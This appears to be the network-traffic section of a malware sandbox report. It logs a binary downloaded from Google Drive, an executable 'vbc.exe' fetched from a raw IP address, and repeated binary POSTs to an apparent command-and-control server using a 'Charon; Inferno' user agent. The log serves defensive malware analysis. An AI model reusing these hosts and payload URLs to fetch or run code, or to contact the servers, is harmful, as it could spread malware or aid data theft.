Network Analysis

GET /uc?export=download&id=1u_LDPUBD8svIuWN6M_dYDxV9pWS_PZM_ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache

HTTP/1.1 302 Moved Temporarily Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 13 Sep 2021 09:32:27 GMT Location: https://doc-00-1c-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/44otpfku4m84nv2baa4uts53scs88sf5/1631525475000/14552286414405439806/*/1u_LDPUBD8svIuWN6M_dYDxV9pWS_PZM_?e=download P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Security-Policy: script-src 'nonce-JxHlZsUz8Yjk9BWnMN1z9g' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/ X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Set-Cookie: NID=223=SEmY7DzAlrdyMluxEECa5vL79Wv9e3ZeHAlDl1VHqF3dXS3iAGlMT_bQGDosUxe8OPyZDS8lRR0hP088yCA0_FJ0CJIyG6RiPJn5S0SbPrYGdl7PTX6wNUg3ZFBr5Zs-ZOI9Cb0OENUuCaSbUpOCw3hh_ZEZJGmwvnNF-aU87QU; expires=Tue, 15-Mar-2022 09:32:27 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Transfer-Encoding: chunked

GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/44otpfku4m84nv2baa4uts53scs88sf5/1631525475000/14552286414405439806/*/1u_LDPUBD8svIuWN6M_dYDxV9pWS_PZM_?e=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Connection: Keep-Alive Cache-Control: no-cache Host: doc-00-1c-docs.googleusercontent.com

HTTP/1.1 200 OK X-GUploader-UploadID: ADPycduspp9XvF4wKTXDNmNbPAvMjf1MkudOUkidaBoPXXfmFWhldFNJLshSrUMQY24nDFSgqnB1hBCqtyhcrrXLiDfU_b214A Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout Access-Control-Allow-Methods: GET,OPTIONS Content-Type: application/octet-stream Content-Disposition: attachment;filename="Mr stan_wTKBYXCRI130.bin";filename*=UTF-8''Mr%20stan_wTKBYXCRI130.bin Date: Mon, 13 Sep 2021 09:32:28 GMT Expires: Mon, 13 Sep 2021 09:32:28 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=jNYKKg== Content-Length: 106560 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"

GET /http/vbc.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E) Host: 23.95.85.181 Connection: Keep-Alive

HTTP/1.1 200 OK Date: Mon, 13 Sep 2021 16:30:49 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 Last-Modified: Mon, 13 Sep 2021 03:35:59 GMT ETag: "12000-5cbd829e7035d" Accept-Ranges: bytes Content-Length: 73728 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload

POST /~element/page.php?id=429 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.243.159.53 Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 305F273C Content-Length: 186 Connection: close

HTTP/1.1 404 Not Found Date: Mon, 13 Sep 2021 09:32:30 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8

POST /~element/page.php?id=429 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.243.159.53 Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 305F273C Content-Length: 186 Connection: close

HTTP/1.1 404 Not Found Date: Mon, 13 Sep 2021 09:32:31 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8

POST /~element/page.php?id=429 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.243.159.53 Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 305F273C Content-Length: 159 Connection: close

HTTP/1.1 404 Not Found Date: Mon, 13 Sep 2021 09:32:32 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8